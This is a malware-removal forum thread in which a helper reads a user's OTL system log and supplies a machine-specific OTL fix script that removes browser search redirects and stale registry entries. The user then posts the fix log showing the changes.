"{1FA77B58-C4FF-405E-8B33-B4FA4568DA6F}" = protocol=6 | dir=in | app=d:\games\lost via domus\gu.exe | 
"{21E140F2-CB43-4BD0-9395-F56BB4142527}" = protocol=17 | dir=in | app=d:\games\lost via domus\detection\launcher.exe | 
"{2CA298A3-9646-419F-BBD3-CC4DCA3C6441}" = protocol=6 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe | 
"{31F0F88D-E918-433F-BA98-5813E1B9F3FA}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{41C07927-8945-41A1-872A-422AC062B132}" = protocol=17 | dir=in | app=d:\games\codename eagle\lobby.exe | 
"{428D384D-8C5C-4F0A-92D6-36475CDF3A3B}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{4EE75D8B-5621-4BDD-A9BC-D25ABDE0F109}" = protocol=6 | dir=in | app=d:\games\lost via domus\detection\launcher.exe | 
"{59CDDD20-7080-4C93-A5E9-73AE1AC9D506}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5C7C13EC-4811-4CB8-9BCC-1674E1FF48A7}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{5D125E11-9EA5-4DB7-8F29-E53F6E5907B2}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{5DA5520C-A7A2-4111-A001-B0FCD1D478B8}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{5E88C156-642A-43D9-B825-CA44DA50E2F0}" = protocol=17 | dir=in | app=d:\games\codename eagle\ce.exe | 
"{61DC7026-0984-45E7-BC91-91FE5E8087D0}" = protocol=17 | dir=in | app=c:\program files (x86)\bitcomet\bitcomet.exe | 
"{621C4A12-7597-4CAE-8161-E55B73EA5D2E}" = protocol=58 | dir=in | [email protected],-28545 | 
"{65210A00-F8A4-4550-BA2B-02954CD7A31B}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe | 
"{697B03EC-EB63-434B-BB54-55C984BCFD27}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe | 
"{7456601F-F4F5-43F6-BBE2-1295B2798031}" = protocol=58 | dir=in | app=system | 
"{74F47DA3-4957-48A6-B361-2937411D11B1}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe | 
"{76E5A99D-688A-4D84-A85B-3220CA7826A3}" = protocol=6 | dir=in | app=c:\program files (x86)\bitcomet\bitcomet.exe | 
"{8357DE09-67FB-4151-BA7F-16684BC13B49}" = protocol=6 | dir=in | app=d:\games\codename eagle\lobby.exe | 
"{84D9AA49-17DE-4C30-B42A-6AE85172B746}" = protocol=17 | dir=in | app=d:\games\lost via domus\yeti_final_win32.exe | 
"{854B0BB5-35C1-4CBD-ADBD-6A516457597A}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{89F0F018-9FF4-44BE-A4EB-DBAD9E683D1D}" = protocol=6 | dir=out | app=%systemroot%\system32\wudfhost.exe | 
"{8B790030-21A6-4046-80F5-75C3958F097D}" = protocol=6 | dir=in | app=d:\games\codename eagle\ce.exe | 
"{98560BE1-0010-4AE2-B1D6-6ED4BAD1AF37}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe | 
"{9E615BC3-0015-47DD-9F43-0E4D6AA0FE3E}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe | 
"{A10E4941-F106-4949-9DD9-E86F16C07E75}" = protocol=17 | dir=in | app=d:\games\lost via domus\gu.exe | 
"{A8DAAC52-343C-443F-AEBF-4F6B7217CDFA}" = protocol=6 | dir=in | app=d:\games\lost via domus\yeti_final_win32.exe | 
"{B256C1C1-AEB6-4F0A-AA96-E2D956EF9806}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{B4259307-6CE3-4B92-9466-7740BC54B7B8}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{BB122876-A5FB-461F-9A09-39132701B2CC}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe | 
"{BE9281E9-0C6C-4B51-95F6-9F87314A494D}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{C1C755CE-A661-471E-8A18-9BC29825A6E0}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe | 
"{C556B6DD-CE40-4275-BAB8-5C9995385049}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{C896A48A-2D38-4F11-82D7-3662183C29AE}" = protocol=6 | dir=in | app=d:\games\steam\steam.exe | 
"{CCCBF416-7A1D-4BEB-8D74-4AC9CDB4DE37}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{CEF8E341-4A55-4A2E-ABD5-1F0325A643B2}" = protocol=17 | dir=in | app=d:\games\steam\steam.exe | 
"{D97EFB98-E414-404F-A7F4-2DFB922AB696}" = protocol=58 | dir=out | [email protected],-28546 | 
"{E044FCA4-D58C-469D-BBED-6AC77E6118D8}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe | 
"{F05B6B69-8907-4F8D-AA1C-F0F658882E06}" = protocol=1 | dir=in | [email protected],-28543 | 
"{F2B437C1-251F-4D89-A754-C3A20CB3582C}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{FA5B1E97-F7D9-4D8C-AE14-CF6FC35E7D86}" = protocol=6 | dir=out | app=system | 
"{FE7025FF-2959-4C46-9593-3F8B9AD9F4AD}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe | 
"TCP Query User{0059D8A7-AF91-40EE-8043-1235CA9426B0}C:\users\mitey fresh\appdata\roaming\spotify\spotify.exe" = protocol=6 | dir=in | app=c:\users\mitey fresh\appdata\roaming\spotify\spotify.exe | 
"TCP Query User{1CBF42CC-8B9A-4582-B34F-21518CE169C6}C:\users\mitey fresh\appdata\roaming\spotify\spotify.exe" = protocol=6 | dir=in | app=c:\users\mitey fresh\appdata\roaming\spotify\spotify.exe | 
"TCP Query User{406FAF84-452C-49F7-BAC9-19DD8A1727BC}D:\games\codename eagle\iplist.exe" = protocol=6 | dir=in | app=d:\games\codename eagle\iplist.exe | 
"TCP Query User{7D94B055-3F99-4304-961F-BFC470B92521}C:\program files (x86)\torntv.com\torntv downloader.exe" = protocol=6 | dir=in | app=c:\program files (x86)\torntv.com\torntv downloader.exe | 
"TCP Query User{C085D7FB-A49B-4CDA-9628-804A618ECFBE}D:\games\codename eagle\lobby.exe" = protocol=6 | dir=in | app=d:\games\codename eagle\lobby.exe | 
"TCP Query User{C691299A-30B2-4403-AA11-B0A5953AE889}D:\games\gta san andreas\gta sa with cleo mod\proxy_sa.exe" = protocol=6 | dir=in | app=d:\games\gta san andreas\gta sa with cleo mod\proxy_sa.exe | 
"TCP Query User{DA14DA00-6F7D-4C44-B830-0C9C4076F3D5}D:\games\steam\steamapps\common\starbound\win32\starbound_server.exe" = protocol=6 | dir=in | app=d:\games\steam\steamapps\common\starbound\win32\starbound_server.exe | 
"TCP Query User{DA62D2E0-210E-462C-BFE6-4578546DEBEC}D:\games\codename eagle\ce.exe" = protocol=6 | dir=in | app=d:\games\codename eagle\ce.exe | 
"UDP Query User{0EB46071-1301-423C-A60B-A1BA9397331E}D:\games\steam\steamapps\common\starbound\win32\starbound_server.exe" = protocol=17 | dir=in | app=d:\games\steam\steamapps\common\starbound\win32\starbound_server.exe | 
"UDP Query User{249359C5-4B04-420F-B2A8-CC3F46FD02F4}D:\games\gta san andreas\gta sa with cleo mod\proxy_sa.exe" = protocol=17 | dir=in | app=d:\games\gta san andreas\gta sa with cleo mod\proxy_sa.exe | 
"UDP Query User{3DD764F9-C7AB-4B2F-B41F-01E700A045D4}D:\games\codename eagle\iplist.exe" = protocol=17 | dir=in | app=d:\games\codename eagle\iplist.exe | 
"UDP Query User{5AC26F4A-3D57-4F7C-92F8-39E22CE5E857}C:\users\mitey fresh\appdata\roaming\spotify\spotify.exe" = protocol=17 | dir=in | app=c:\users\mitey fresh\appdata\roaming\spotify\spotify.exe | 
"UDP Query User{633F24D5-BB9C-4C70-B201-C47B1E152309}D:\games\codename eagle\lobby.exe" = protocol=17 | dir=in | app=d:\games\codename eagle\lobby.exe | 
"UDP Query User{72F728F1-2F37-4747-B67B-7D19EE8E2D6B}C:\users\mitey fresh\appdata\roaming\spotify\spotify.exe" = protocol=17 | dir=in | app=c:\users\mitey fresh\appdata\roaming\spotify\spotify.exe | 
"UDP Query User{7EAEBC5E-DC35-48A7-8A50-B3140CEB1316}C:\program files (x86)\torntv.com\torntv downloader.exe" = protocol=17 | dir=in | app=c:\program files (x86)\torntv.com\torntv downloader.exe | 
"UDP Query User{E6D0FFF1-98A5-4452-B161-21E64DCA05B8}D:\games\codename eagle\ce.exe" = protocol=17 | dir=in | app=d:\games\codename eagle\ce.exe | 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{23F2C78C-E131-4CA0-8F84-3473FB7728BA}" = Microsoft Security Client
"{26A24AE4-039D-4CA4-87B4-2F86417017FF}" = Java 7 Update 17 (64-bit)
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6965A8D2-465D-4F98-9FAA-0E9E2348F329}" = Microsoft LifeCam
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9C5A08BF-BB99-4998-81BD-F6CC32483B34}" = Microsoft Corporation
"{C168639F-5810-4EC8-B1E8-0251AA8A771C}" = File Association Helper
"{CD95F661-A5C4-44F5-A6AA-ECDD91C240E3}" = WinZip 18.5
"{CE52672C-A0E9-4450-8875-88A221D5CD50}" = Windows Live ID Sign-in Assistant
"{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319
"{E9FA781F-3E80-4399-825A-AD3E11C28C77}" = MSVCRT110_amd64
"Microsoft Security Client" = Microsoft Security Essentials
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator
"{03D562B5-C4E2-4846-A920-33178788BE00}" = Windows Live Communications Platform
"{0F929651-F516-4956-90F2-FFBD2CD5D30E}" = Photo Gallery
"{0FF9CC94-EF23-401E-BDBD-37403D1A2B38}" = Windows Live SOXE Definitions
"{196BB40D-1578-3D01-B289-BEFC77A11A1E}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319
"{22800204-9E53-45C7-B6F3-5BB0F1C1A147}" = Jing
"{24D37B30-83B4-46A7-A691-30F2FCEAE58E}" = AUSkey software 1.4.4
"{26A24AE4-039D-4CA4-87B4-2F83217017FF}" = Java 7 Update 65
"{2702B8FC-6003-4AC6-ADBC-EC65746D800A}" = Lost Via Domus
"{2AC01935-3774-4981-98C8-14E93C14372C}" = Windows Live UX Platform Language Pack
"{37476589-E48E-439E-A706-56189E2ED4C4}_is1" = Browser AdBlocker
"{45898170-E68C-4F02-AA35-C2186BF347A3}" = Movie Maker
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}" = Skype™ 6.11
"{52E225FC-FCB4-41F7-837B-6E37FB05BD7B}" = Adobe AIR
"{5A0EE0F0-E909-4F3B-B437-AAD9252427CB}" = Windows Live Installer
"{5E094C92-6288-4F43-AA9A-D452D0218F3F}" = Windows Live Essentials
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}" = Microsoft Games for Windows Marketplace
"{6B6923B9-8719-425B-916C-CD2908F31AAF}" = Windows Live SOXE
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}" = Microsoft Games for Windows - LIVE Redistributable
"{89C7E0A7-4D9D-4DCC-8834-A9A2B92D7EBB}" = Photo Gallery
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8E14DDC8-EA60-4E18-B3E3-1937104D5BDA}" = MSVCRT110
"{90120000-0020-0409-0000-0000000FF1CE}" = Compatibility Pack for the 2007 Office system
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{91110409-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Professional Edition 2003
"{95FC26FB-19FD-4A96-BBB1-B1062E8648F5}" = AGEIA PhysX v7.11.13
"{974C4B12-4D02-4879-85E0-61C95CC63E9E}" = Fallout 3
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AC76BA86-7AD7-1033-7B44-AB0000000001}" = Adobe Reader XI (11.0.07)
"{AC7E7905-8C59-4806-A96D-30936A2B1FC5}" = Citrix Online Launcher
"{B39A6825-EA20-43EA-AB2D-A6BC0298D9A1}" = Movie Maker
"{B3BC9DB1-0B0A-48B0-B86B-EA77CAA7F800}" = Microsoft Corporation
"{C6640705-7479-4EE5-BC86-879F05F65E74}" = Google Drive
"{C6B0EE9E-2128-4448-B7AE-5E2B46E0F0E7}" = Windows Live Photo Common
"{DD7C5FC1-DCA5-487A-AF23-658B1C00243F}" = Photo Common
"{DE730F37-A198-4112-A3B6-97786F34354A}" = ECI Client v6.0
"{E0601182-5F00-4513-95D0-AFDCB7A0C658}" = calibre
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E3445598-4424-4EE2-B71C-C23325F7FB71}" = Windows Live PIMT Platform
"{EF5E9233-9C42-41C4-AD58-1522DDF89018}" = LogMeIn Hamachi
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0E58739-2B4C-498F-9B0D-FF0F2FD52B61}" = Windows Live UX Platform
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 15 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 15 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 12.0
"DAEMON Tools Lite" = DAEMON Tools Lite
"Fallout New Vegas Ultimate Edition_is1" = Fallout New Vegas Ultimate Edition
"Google Chrome" = Google Chrome
"iSkysoft Video Converter Ultimate_is1" = iSkysoft Video Converter Ultimate(Build 5.4.1.0)
"LogMeIn Hamachi" = LogMeIn Hamachi
"MixPad" = MixPad
"Mozilla Firefox 28.0 (x86 en-US)" = Mozilla Firefox 28.0 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"MTA:SA 1.3" = MTA:SA v1.3.5
"OutfoxTV" = OutfoxTV
"outlookset" = Outlook Setup Tool
"PhotoPad" = PhotoPad Image Editor
"Pixillion" = Pixillion Image Converter
"Steam" = Steam
"Steam App 211820" = Starbound
"Switch" = Switch Sound File Converter
"VLC media player" = VLC media player
"WavePad" = WavePad Sound Editor
"WinLiveSuite" = Windows Live Essentials
 
========== HKEY_USERS Uninstall List ==========
 
[HKEY_USERS\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"GoToMeeting" = GoToMeeting 6.4.4.1831
"Spotify" = Spotify
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 20/10/2014 7:11:29 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3012
Description = The performance strings in the Performance registry value is corrupted
 when process Performance extension counter provider. The BaseIndex value from the
 Performance registry is the first DWORD in the Data section, LastCounter value 
is the second DWORD in the Data section, and LastHelp value is the third DWORD in
 the Data section.
 
Error - 20/10/2014 7:11:29 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3011
Description = Unloading the performance counter strings for service WmiApRpl (WmiApRpl)
 failed. The first DWORD in the Data section contains the error code.
 
Error - 21/10/2014 3:40:31 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3012
Description = The performance strings in the Performance registry value is corrupted
 when process Performance extension counter provider. The BaseIndex value from the
 Performance registry is the first DWORD in the Data section, LastCounter value 
is the second DWORD in the Data section, and LastHelp value is the third DWORD in
 the Data section.
 
Error - 21/10/2014 3:40:31 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3011
Description = Unloading the performance counter strings for service WmiApRpl (WmiApRpl)
 failed. The first DWORD in the Data section contains the error code.
 
Error - 21/10/2014 10:14:56 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3012
Description = The performance strings in the Performance registry value is corrupted
 when process Performance extension counter provider. The BaseIndex value from the
 Performance registry is the first DWORD in the Data section, LastCounter value 
is the second DWORD in the Data section, and LastHelp value is the third DWORD in
 the Data section.
 
Error - 21/10/2014 10:14:56 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3011
Description = Unloading the performance counter strings for service WmiApRpl (WmiApRpl)
 failed. The first DWORD in the Data section contains the error code.
 
Error - 21/10/2014 11:04:41 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3012
Description = The performance strings in the Performance registry value is corrupted
 when process Performance extension counter provider. The BaseIndex value from the
 Performance registry is the first DWORD in the Data section, LastCounter value 
is the second DWORD in the Data section, and LastHelp value is the third DWORD in
 the Data section.
 
Error - 21/10/2014 11:04:41 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3011
Description = Unloading the performance counter strings for service WmiApRpl (WmiApRpl)
 failed. The first DWORD in the Data section contains the error code.
 
Error - 21/10/2014 11:11:33 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3012
Description = The performance strings in the Performance registry value is corrupted
 when process Performance extension counter provider. The BaseIndex value from the
 Performance registry is the first DWORD in the Data section, LastCounter value 
is the second DWORD in the Data section, and LastHelp value is the third DWORD in
 the Data section.
 
Error - 21/10/2014 11:11:33 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3011
Description = Unloading the performance counter strings for service WmiApRpl (WmiApRpl)
 failed. The first DWORD in the Data section contains the error code.
 
[ System Events ]
Error - 20/10/2014 10:28:01 AM | Computer Name = Kirra-PC | Source = Service Control Manager | ID = 7030
Description = The LogMeIn Hamachi Tunneling Engine service is marked as an interactive
 service.  However, the system is configured to not allow interactive services. 
 This service may not function properly.
 
Error - 21/10/2014 11:09:30 PM | Computer Name = Kirra-PC | Source = Service Control Manager | ID = 7009
Description = A timeout was reached (30000 milliseconds) while waiting for the Google
 Update Service (gupdate) service to connect.
 
Error - 21/10/2014 11:09:30 PM | Computer Name = Kirra-PC | Source = Service Control Manager | ID = 7000
Description = The Google Update Service (gupdate) service failed to start due to
 the following error:   %%1053
 
 
< End of report >
 



#11
Biscuithd


    Trusted Helper

  • Malware Removal
  • 2,573 posts

Yup, I see it (the redirect) now.

 

Sorry for my slow response. My life suddenly got very busy!

 

I'll have a fix for you later this afternoon (Eastern time US) or this evening.



#12
Biscuithd


    Trusted Helper

  • Malware Removal
  • 2,573 posts

Ok, let's do this.

 

Fix with OTL

Please re-run OTL with this removal script included.



This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.

  • Right-click on the OTL icon and select Run as Administrator to start the tool.
  • Under the Custom Scans/Fixes bar in the box paste in the following:
    :Commands
    
    [SetRestorePoint]
    :OTL
    
    IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    
    IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
    
    IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    
    FF - user.js - File not found
    
    FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll File not found
    
    IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
    
    [2013/10/05 13:03:05 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Extensions
    
    [2014/06/05 12:10:08 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
    
    CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
    
    CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
    
    CHR - plugin: Error reading preferences file
    
    O4 - HKU\.DEFAULT..\RunOnce: [SPReview] "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft..../?LinkID=122915" /build:7601 File not found
    
    O4 - HKU\S-1-5-18..\RunOnce: [SPReview] "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft..../?LinkID=122915" /build:7601 File not found
    
    O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
    
    O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
    
    O18:64bit: - Protocol\Handler\msdaipp - No CLSID value found
    
    O18:64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
    
    O18:64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
    
    O18:64bit: - Protocol\Handler\mso-offdap - No CLSID value found
    
    O18:64bit: - Protocol\Handler\mso-offdap11 - No CLSID value found
    
    O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
    
    O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
    
    O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
    
    O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
    
    [2014/09/30 17:07:43 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
    :Commands
    
    [emptytemp]
    
    [resethosts]
    
    [reboot]
  • Push Run Fix and wait patiently.
  • If asked to reboot, please allow it to.
  • A Notepad window with a logfile will open after this run. It will also be saved in the _OTL\MovedFiles directory on your main drive as (date)_(time).log.

Please include the content of this logfile in your next reply.



#13
awesomesauce


    Member

  • Topic Starter
  • 21 posts

Thank you for your fix. Here is the log:
 

All processes killed
========== COMMANDS ==========
Error: Unable to interpret <[SetRestorePoint]> in the current context!
========== OTL ==========
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
64bit-Registry key HKEY_LOCAL_MACHINE\Software\MozillaPlugins\@adobe.com/FlashPlayer\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Extensions folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions folder moved successfully.
Use Chrome's Settings page to remove the default_search_provider items.
Use Chrome's Settings page to remove the default_search_provider items.
Registry value HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SPReview deleted successfully.
Registry value HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SPReview not found.
Registry value HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce\\mctadmin deleted successfully.
Registry value HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce\\mctadmin deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\msdaipp\ deleted successfully.
File Protocol\Handler\msdaipp - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\msdaipp\0x00000001\ not found.
File Protocol\Handler\msdaipp\0x00000001 - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\msdaipp\oledb\ not found.
File Protocol\Handler\msdaipp\oledb - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mso-offdap\ deleted successfully.
File Protocol\Handler\mso-offdap - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mso-offdap11\ deleted successfully.
File Protocol\Handler\mso-offdap11 - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\skype4com\ deleted successfully.
File Protocol\Handler\skype4com - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\wlpg\ deleted successfully.
File Protocol\Handler\wlpg - No CLSID value found not found.
64bit-Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\\WebCheck deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\ not found.
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\\WebCheck deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\ not found.
C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A} folder moved successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 57472 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: Mitey Fresh
->Temp folder emptied: 8937853 bytes
->Temporary Internet Files folder emptied: 9720979 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 13604334 bytes
->Google Chrome cache emptied: 112231968 bytes
->Flash cache emptied: 58431 bytes
 
User: Public
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 13379569 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 128 bytes
RecycleBin emptied: 16228013 bytes
 
Total Files Cleaned = 166.00 mb
 
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully
 
OTL by OldTimer - Version 3.2.69.0 log created on 10242014_075708
 
Files\Folders moved on Reboot...
C:\Users\Mitey Fresh\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.
File\Folder C:\Users\Mitey Fresh\AppData\Local\Temp\~DFD7914A0DC404D3A7.TMP not found!
